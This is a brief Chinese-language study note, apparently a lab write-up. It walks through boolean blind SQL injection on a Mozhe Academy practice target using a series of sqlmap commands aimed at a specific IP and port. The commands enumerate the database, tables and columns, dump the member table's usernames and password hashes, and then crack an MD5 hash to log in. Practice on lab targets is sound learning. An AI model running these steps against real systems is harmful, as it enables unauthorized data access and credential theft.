sqlmap注入（布尔盲注）

本人小白 仅仅作为学习笔记 希望通过一次次的记录可以一次次的成长 

sqlmap是一个自动化的sql注入工具，主要功能是扫描发现并利用注入漏洞

使用墨者学院的靶机进行测试  这里我们使用的是SQL注入漏洞测试(布尔盲注)

通过滚动条找到注入点

然后我们使用的是kali下的工具sqlmap 

 sqlmap -u http://219.153.49.228:46473/new_list.php?id=1

然后我们直接爆出数据库名字

sqlmap -u http://219.153.49.228:46473/new_list.php?id=1 --current -db

 爆出数据库名字为 stormgroup

然后报表名

sqlmap -u http://219.153.49.228:46473/new_list.php?id=1 -D stormgroup --tables

爆出两个表  mumber notice

然后爆出表下的列名

sqlmap -u http://219.153.49.228:46473/new_list.php?id=1 -D stormgroup  -T member --columns

这里爆出一个name 一个password 也就是我们需要的

然后我们爆出密码和用户名

sqlmap -u http://219.153.49.228:46473/new_list.php?id=1 -D stormgroup  -T member -C name,password --dump

然后去百度md5解密可以得到第二个密码可以登录 

完成。